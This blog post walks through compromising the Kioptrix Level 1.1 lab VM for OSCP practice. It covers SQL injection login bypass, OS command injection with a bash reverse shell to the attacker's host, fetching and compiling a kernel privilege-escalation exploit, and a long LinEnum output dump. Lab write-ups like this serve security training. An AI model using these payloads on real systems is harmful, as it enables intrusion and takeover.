Tag Archives: oscp like vm

OSCP like Vulnhub machines: Kioptrix: Level 1.1 (#2))

Kudos to abatchy’s blog for compiling this list.

Download VM

We are going to start identifying the device my using

netdiscover -Lr 192.168.1.0/24

Where 192.168.1.0/24 is my home network’s range, -L is to keep listening and -r is to specify range.

From that command i’ve found out the IP Address of the target as 192.168.1.10.

As usual, we are going to start the enumeration by a Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.10

And the output is as follows.

Nmap scan report for 192.168.1.10
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            627/udp   status
|_  100024  1            630/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2020-12-14T11:11:35+00:00; -2h09m37s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

We can see there is an HTTP website and an HTTPS website running in the target. Inspecting them on the browser has showed a webpage like the following.

Website running on Kioptrix

Since this is an easy machine, I pulled up one of the oldest but greatest hacking trick in a hacker’s sleeve. SQL Injection.

'OR 1=1--
Trying SQL Injection in Kioptrix’s login page

It worked like a charm! But it was unsurprising as this is intended to be an easy machine.

We were presented with a Web console after the successful SQL Injection

The web console was intended to ping any machine on the network and give us the results. Entering an IP address in the console presented us with a familiar output.

Output of ping

The output is exactly the same output as the ping tool in linux. So, it is safe to assume that the web page is working as a frontend and passing the IP parameter to the ping tool.

The PHP code to perform this will look like the following.

$IP= $_REQUEST[ 'ip' ];
 # Reading User's IP input from text box
shell_exec( 'ping -c 4 ' . $IP); # The unsanitized input is passed to shell_exec() function

So, if the frontend developer didn’t code securely (like the above code), then we can perform an OS Command injection.

To perform a OS command injection, we can use the (;) Semicolon character to terminate the ping command and inject our own command.

So, if we pass the value 

192.168.1.2;whoami

We will get the following output.

OS command injection succesful

We can see that the OS injection was successful, as the output of whoami command is also showing.

Now, we can use a bash reverse shell one liner from PayloadAllTheThings and our payload becomes the following.

192.168.1.2; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1

Here, 192.168.1.9 is our attacking Kali machine and 9001 is the listening address. 

rlwrap nc -lvnp 9001

I started a Netcat listener and passed the payload in the web console. Here rlwrap is used to make ‘dumb’ reverse shells a little more tolerable. Specifying rlwrap before nc listener will spawn a reverse shell that has capabilities like command history and moving between characters using arrow keys.

But, keep in mind that specifying rlwrap is NOT EQUAL TO or a viable replacement to spawning an actual TTY shell. This is used to make interactions with a dumb shell a little more comfortable.

And by passing the above payload to the web console, we got the reverse shell back from the target!

Got Reverse Shell!

Now that we have the initial foothold on the machine, let’s begin the local enumeration process.

On the /var/www/html directory, i have found the two files responsible for the Web console. Inspecting the files has given us credentials to the MySQL service running in the target machine.

Exposed MySQL db credentials in the index.php file

I’ve logged in to the MySQL service using these credentials, but I couldn’t see the output, since we are not in an actual TTY shell. That means we have to upgrade our dumb shell to a full TTY shell.

Let’s see if the machine have python or not using the command which python. Lucky for me python was already installed in the machine. Let’s upgrade the shell now using the following python one liner.

python -c 'import pty;pty.spawn("/bin/bash")'

And we’ve succesfully upgraded the shell to a full TTY shell. We can check if our current shell is TTY or not by issuing the tty command.

Upgrading to TTY shell

Now, let’s login to MySQL using the following command. The password will be prompted after entering this command.

mysql -u john -p

Enumerating the database didn’t provide us any fruitful results except the these credentials and the fact that john’s same password is used for logging into MySQL root account.

Contents of the users table

I have tried logging into SSH using these credentials to test for password reuse, but it was futile. Oh well!

Moving on…

Let’s enumerate the system for possible Privsec routes. I’ve used the trusty old. LinEnum.sh script for enumerating the machine. I started a python web server using python -m http.server 80 on my Kali machine and issued wget http://192.168.1.9/LinEnum.sh on the target machine to download the enumeration script on the target.

And while the script is running, let’s check the target’s distribution version, by issuing the following commands.

lsb_release -a
uname -a
Target is running CentOS 4.5 which dates back to 2007

So, it is an old (obsolete to be fair) version of CentOS and I am pretty sure that there are tons of Privilege escalation exploits for this version.

So, let’s find the possible exploits for this version. I am using the distribution name and kernel version (2.6) as the query.

searchsploit centos 2.6
Potential Kernel exploits for the target

The second to last result sounds promising since our kernel version is 2.6.55 and the exploit is for kernels ranging from 2.6.32 to 3.x. The exploit db id is 9542.

Let’s examine the exploit contents by using the following command.

searchsploit -x 9542
Contents of 9542.c

This exploit does look promising and the compilation is rudimentary.

Now, let’s copy the exploit to our present working directory using the following command.

searchsploit -m 9542

Now we can try exploiting this right away. But, since we are in this for learning purposes, let’s take things slow; as I want to see if there are additional privilege escalation vectors intended by the creator and of course manual exploitation is way more satisfying.

Using a Kernel vulnerability to escalate privileges always make me feel a little bit guilty.

The output of the LinEnum script is given at the end of this post as it is too long.

Unfortunately, I didn’t find any valid privesc routes. There was an ESMTP server running within the localhost and the CUPS service (which we found in the Nmap scan) which looked promising; but, exploitation attempts on both services failed. So, they must’ve been rabbit holes!

Moving On..

Let’s move on to the kernel exploit we found earlier. From the LinEnum.sh output, I have already seen that the target machine has gcc. So, the only remaining step is to move the exploit to the target machine and compile it.

Change the working directory to /tmp and download the exploit to the target. just like we did before. (Combo of http.server python module and wget).

Compile the exploit with gcc 9542.c -o exploit and run it with ./exploit.

And we are root!

The output of LinEnum.sh is given below:


[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Fri Dec 18 23:36:25 EST 2020
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007


[00;31m[-] Specific release information:[00m
CentOS release 4.5 (Final)


[00;31m[-] Hostname:[00m
kioptrix.level2


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=48(apache) gid=48(apache) groups=48(apache)


[00;31m[-] Who else is logged on:[00m
 23:36:25 up 12 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=1(bin) gid=1(bin) groups=1(bin),2(daemon),3(sys)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=9(news) gid=13(news) groups=13(news)
uid=10(uucp) gid=14(uucp) groups=14(uucp)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=13(gopher) gid=30(gopher) groups=30(gopher)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=69(vcsa) gid=69(vcsa) groups=69(vcsa)
uid=37(rpm) gid=37(rpm) groups=37(rpm)
uid=68(haldaemon) gid=68(haldaemon) groups=68(haldaemon)
uid=34(netdump) gid=34(netdump) groups=34(netdump)
uid=28(nscd) gid=28(nscd) groups=28(nscd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=47(mailnull) gid=47(mailnull) groups=47(mailnull)
uid=51(smmsp) gid=51(smmsp) groups=51(smmsp)
uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser)
uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
uid=77(pcap) gid=77(pcap) groups=77(pcap)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=23(squid) gid=23(squid) groups=23(squid)
uid=67(webalizer) gid=67(webalizer) groups=67(webalizer)
uid=43(xfs) gid=43(xfs) groups=43(xfs)
uid=38(ntp) gid=38(ntp) groups=38(ntp)
uid=66(pegasus) gid=65(pegasus) groups=65(pegasus)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=500(john) gid=500(john) groups=500(john)
uid=501(harold) gid=501(harold) groups=501(harold)


[00;31m[-] It looks like we have some admin users:[00m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Are permissions on /home directories lax:[00m
total 24K
drwxr-xr-x   4 root   root   4.0K Oct 12  2009 .
drwxr-xr-x  23 root   root   4.0K Dec 18 23:24 ..
drwx------   2 harold harold 4.0K Oct 12  2009 harold
drwx------   2 john   john   4.0K Oct  8  2009 john


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
CONSOLE=/dev/console
SELINUX_INIT=YES
TERM=linux
INIT_VERSION=sysvinit-2.85
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
runlevel=3
RUNLEVEL=3
PWD=/tmp
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N
SHLVL=5
HOME=/
_=/bin/env


[00;31m[-] SELinux seems to be present:[00m
SELinux status:		disabled


[00;31m[-] Path information:[00m
/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /bin
drwxr-xr-x  2 root root 12288 Oct  7  2009 /sbin
drwxr-xr-x  2 root root 36864 Oct  9  2009 /usr/bin
drwxr-xr-x  2 root root 12288 Oct  8  2009 /usr/sbin
drwxr-xr-x  2 root root  4096 Oct  7  2009 /usr/X11R6/bin


[00;31m[-] Available shells:[00m
/bin/sh
/bin/bash
/sbin/nologin
/bin/ash
/bin/bsh
/bin/ksh
/usr/bin/ksh
/usr/bin/pdksh
/bin/tcsh
/bin/csh
/bin/zsh


[00;31m[-] Current umask value:[00m
u=rwx,g=rx,o=rx
0022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r--  1 root root    0 Oct  7  2009 /etc/cron.deny
-rw-r--r--  1 root root  255 Feb 21  2005 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x   2 root root  4096 Jul 12  2006 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.daily:
total 108
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
lrwxrwxrwx   1 root root    28 Oct  7  2009 00-logwatch -> ../log.d/scripts/logwatch.pl
-rwxr-xr-x   1 root root   418 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   135 Feb 21  2005 00webalizer
-rwxr-xr-x   1 root root   276 Feb 21  2005 0anacron
-rw-r--r--   1 root root   797 Feb 21  2005 certwatch
-rwxr-xr-x   1 root root   180 Oct 20  2006 logrotate
-rwxr-xr-x   1 root root  2133 Dec  1  2004 prelink
-rwxr-xr-x   1 root root   104 May  4  2007 rpm
-rwxr-xr-x   1 root root   121 Aug 21  2005 slocate.cron
-rwxr-xr-x   1 root root   286 Feb 21  2005 tmpwatch
-rwxr-xr-x   1 root root   158 May  5  2007 yum.cron

/etc/cron.hourly:
total 24
drwxr-xr-x   2 root root  4096 Feb 21  2005 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..

/etc/cron.monthly:
total 32
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rwxr-xr-x   1 root root   278 Feb 21  2005 0anacron

/etc/cron.weekly:
total 48
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rwxr-xr-x   1 root root   414 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   277 Feb 21  2005 0anacron
-rwxr-xr-x   1 root root    90 May  5  2007 yum.cron


[00;31m[-] Crontab contents:[00m
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


[00;31m[-] Anacron jobs and associated file permissions:[00m
-rw-r--r--  1 root root 329 Feb 21  2005 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron

# See anacron(8) and anacrontab(5) for details.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

1	65	cron.daily		run-parts /etc/cron.daily
7	70	cron.weekly		run-parts /etc/cron.weekly
30	75	cron.monthly		run-parts /etc/cron.monthly


[00;31m[-] When were jobs last executed (/var/spool/anacron contents):[00m
total 28
drwxr-xr-x   2 root root 4096 Oct  7  2009 .
drwxr-xr-x  14 root root 4096 Oct  7  2009 ..
-rw-------   1 root root    9 Oct 12  2009 cron.daily
-rw-------   1 root root    9 Oct  7  2009 cron.monthly
-rw-------   1 root root    9 Oct 11  2009 cron.weekly


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0      Link encap:Ethernet  HWaddr 00:0C:29:13:53:6F  
          inet addr:192.168.1.10  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe13:536f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:483 errors:0 dropped:0 overruns:0 frame:0
          TX packets:266 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:94501 (92.2 KiB)  TX bytes:35907 (35.0 KiB)
          Interrupt:177 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:173 errors:0 dropped:0 overruns:0 frame:0
          TX packets:173 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:12722 (12.4 KiB)  TX bytes:12722 (12.4 KiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)


[00;31m[-] ARP history:[00m
kali.domain.name (192.168.1.9) at 00:00:00:00:00:00 [ether] on eth0
RTK_GW.domain.name (192.168.1.1) at 00:00:00:00:00:00  [ether] on eth0


[00;31m[-] Nameserver(s):[00m
nameserver 192.168.1.1
nameserver 1.1.1.1
nameserver 8.8.8.8


[00;31m[-] Default route:[00m
default         RTK_GW.domain.n 0.0.0.0         UG    0      0        0 eth0


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:646                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:631                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 :::80                       :::*                        LISTEN      3835/sh             
tcp        0      0 :::22                       :::*                        LISTEN      -                   
tcp        0      0 :::443                      :::*                        LISTEN      3835/sh             


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
udp        0      0 0.0.0.0:640                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:643                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:631                 0.0.0.0:*                               -                   


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.4  1976  544 ?        S    23:23   0:02 init [3]                                   
root         2  0.0  0.0     0    0 ?        SN   23:23   0:00 [ksoftirqd/0]
root         3  0.0  0.0     0    0 ?        S<   23:23   0:00 [events/0]
root         4  0.0  0.0     0    0 ?        S<   23:23   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   23:23   0:00 [kacpid]
root        82  0.0  0.0     0    0 ?        S<   23:23   0:00 [kblockd/0]
root        83  0.0  0.0     0    0 ?        S    23:23   0:00 [khubd]
root       100  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       101  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       102  0.0  0.0     0    0 ?        S    23:23   0:00 [kswapd0]
root       103  0.0  0.0     0    0 ?        S<   23:23   0:00 [aio/0]
root       249  0.0  0.0     0    0 ?        S    23:23   0:00 [kseriod]
root       482  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata/0]
root       483  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata_aux]
root       498  0.0  0.0     0    0 ?        S    23:23   0:00 [kjournald]
root      1745  0.0  0.3  3272  440 ?        S<s  23:23   0:00 udevd
root      1777  0.0  0.0     0    0 ?        S    23:23   0:00 [shpchpd_event]
root      1862  0.0  0.0     0    0 ?        S<   23:23   0:00 [kauditd]
root      1974  0.0  0.0     0    0 ?        S    23:24   0:00 [kjournald]
root      2534  0.0  0.4  1564  540 ?        Ss   23:24   0:00 syslogd -m 0
root      2538  0.0  0.3  2340  384 ?        Ss   23:24   0:00 klogd -x
rpc       2565  0.0  0.4  2400  540 ?        Ss   23:24   0:00 portmap
rpcuser   2584  0.0  0.6  2984  820 ?        Ss   23:24   0:00 rpc.statd
root      2610  0.0  0.2  5844  372 ?        Ss   23:24   0:00 rpc.idmapd
root      2682  0.0  0.3  3472  444 ?        Ss   23:24   0:00 /usr/sbin/acpid
root      2691  0.0  1.7  8320 2208 ?        Ss   23:24   0:00 cupsd
root      2743  0.0  0.8  5808 1124 ?        Ss   23:24   0:00 /usr/sbin/sshd
root      2779  0.0  0.6  3196  768 ?        Ss   23:24   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root      2797  0.0  1.4  8348 1860 ?        Ss   23:24   0:00 sendmail: accepting connections
smmsp     2806  0.0  1.2  7200 1628 ?        Ss   23:24   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      2816  0.0  0.2  2316  348 ?        Ss   23:24   0:00 gpm -m /dev/input/mice -t imps2
root      2825  0.0  0.7  4724  936 ?        Ss   23:24   0:00 crond
xfs       2847  0.0  1.0  3992 1300 ?        Ss   23:24   0:00 xfs -droppriv -daemon
root      2856  0.0  0.4  2280  504 ?        SNs  23:24   0:00 anacron -s
root      2864  0.0  0.3  3108  424 ?        Ss   23:24   0:00 /usr/sbin/atd
dbus      2873  0.0  0.6  3432  804 ?        Ss   23:24   0:00 dbus-daemon-1 --system
root      2882  0.0  4.5  8280 5764 ?        Ss   23:24   0:00 hald
root      3137  0.0  0.4  3256  596 ?        Ss   23:24   0:00 dhclient
root      3139  0.0  7.0 20416 8860 ?        Ss   23:24   0:00 httpd
root      3165  0.0  0.9  5852 1236 ?        S    23:24   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql     3207  0.0 14.6 125668 18424 ?      Sl   23:24   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
apache    3212  0.0  4.5 20548 5776 ?        S    23:24   0:00 httpd
apache    3213  0.0  3.9 20416 4920 ?        S    23:24   0:00 httpd
apache    3214  0.0  4.5 20560 5776 ?        S    23:24   0:00 httpd
apache    3215  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3216  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3217  0.0  3.4 20416 4296 ?        S    23:24   0:00 httpd
apache    3218  0.0  4.2 20416 5376 ?        S    23:24   0:00 httpd
apache    3219  0.0  4.2 20420 5324 ?        S    23:24   0:00 httpd
root      3237  0.0  0.3  3304  384 tty1     Ss+  23:24   0:00 /sbin/mingetty tty1
root      3238  0.0  0.3  2500  388 tty2     Ss+  23:24   0:00 /sbin/mingetty tty2
root      3239  0.0  0.3  3164  388 tty3     Ss+  23:24   0:00 /sbin/mingetty tty3
root      3240  0.0  0.3  1932  388 tty4     Ss+  23:24   0:00 /sbin/mingetty tty4
root      3241  0.0  0.3  2772  388 tty5     Ss+  23:24   0:00 /sbin/mingetty tty5
root      3242  0.0  0.3  2776  384 tty6     Ss+  23:24   0:00 /sbin/mingetty tty6
apache    3835  0.0  0.8  4912 1124 ?        S    23:33   0:00 sh -c ping -c 3 127.0.0.1; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1
apache    3837  0.0  1.0  4684 1332 ?        S    23:33   0:00 bash -i
apache    3845  0.0  1.1  4912 1420 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    3846  0.0  0.6  4944  864 ?        R    23:36   0:00 bash ./LinEnum.sh
apache    3848  0.0  0.3  5480  452 ?        S    23:36   0:00 tee -a
apache    3849  0.3  0.3  4376  452 ?        S    23:36   0:00 tee report.txt
apache    4046  0.0  0.6  4944  808 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    4047  0.0  0.6  4152  792 ?        R    23:36   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
lrwxrwxrwx  1 root root       4 Oct  7  2009 /bin/sh -> bash
-rwxr-xr-x  1 root root   12772 Feb 21  2005 /sbin/mingetty
-rwxr-xr-x  1 root root 6036288 Jul 25  2008 /usr/libexec/mysqld
-rwxr-x---  1 root root   22540 Feb 21  2005 /usr/sbin/acpid
-rwxr-xr-x  1 root root   19544 Apr 26  2006 /usr/sbin/atd
-rwxr-xr-x  1 root root  313008 May  2  2007 /usr/sbin/sshd


[00;31m[-] Contents of /etc/xinetd.conf:[00m
#
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{
	instances               = 60
        log_type                = SYSLOG authpriv
        log_on_success		= HOST PID
        log_on_failure		= HOST
	cps			= 25 30
}

includedir /etc/xinetd.d


[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:[00m
total 144
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rw-r--r--   1 root root   563 Aug 21  2005 chargen
-rw-r--r--   1 root root   580 Aug 21  2005 chargen-udp
-rwxr-xr-x   1 root root   239 May  3  2007 cups-lpd
-rw-r--r--   1 root root   419 Aug 21  2005 daytime
-rw-r--r--   1 root root   438 Aug 21  2005 daytime-udp
-rw-r--r--   1 root root   341 Aug 21  2005 echo
-rw-r--r--   1 root root   360 Aug 21  2005 echo-udp
-rw-r--r--   1 root root   323 May  3  2007 eklogin
-rw-r--r--   1 root root   326 May  3  2007 gssftp
-rw-r--r--   1 root root   310 May  3  2007 klogin
-rw-r--r--   1 root root   323 May  3  2007 krb5-telnet
-rw-r--r--   1 root root   308 May  3  2007 kshell
-rw-r--r--   1 root root   317 Feb 21  2005 rsync
-rw-r--r--   1 root root   497 Aug 21  2005 time
-rw-r--r--   1 root root   518 Aug 21  2005 time-udp


[00;31m[-] /etc/init.d/ binary permissions:[00m
lrwxrwxrwx  1 root root 11 Oct  7  2009 /etc/init.d -> rc.d/init.d


[00;31m[-] /etc/rc.d/init.d binary permissions:[00m
total 712
drwxr-xr-x   2 root root     4096 Oct  8  2009 .
drwxr-xr-x  10 root root     4096 Oct  7  2009 ..
-rwxr-xr-x   1 root root     1128 Feb 21  2005 acpid
-rwxr-xr-x   1 root root      834 Feb 21  2005 anacron
-rwxr-xr-x   1 root root     1429 Feb 21  2005 apmd
-rwxr-xr-x   1 root root     4404 Feb 21  2005 arptables_jf
-rwxr-xr-x   1 root root     1176 Apr 26  2006 atd
-rwxr-xr-x   1 root root     2781 May  2  2007 auditd
-rwxr-xr-x   1 root root    16544 May  3  2007 autofs
-rwxr-xr-x   1 root root     1368 Feb 21  2005 bluetooth
-rwxr-xr-x   1 root root     1355 May  2  2007 cpuspeed
-rwxr-xr-x   1 root root     1904 Jul 12  2006 crond
-rwxr-xr-x   1 root root     2312 May  3  2007 cups
-rwxr-xr-x   1 root root     1502 Feb 21  2005 dc_client
-rwxr-xr-x   1 root root     1344 Feb 21  2005 dc_server
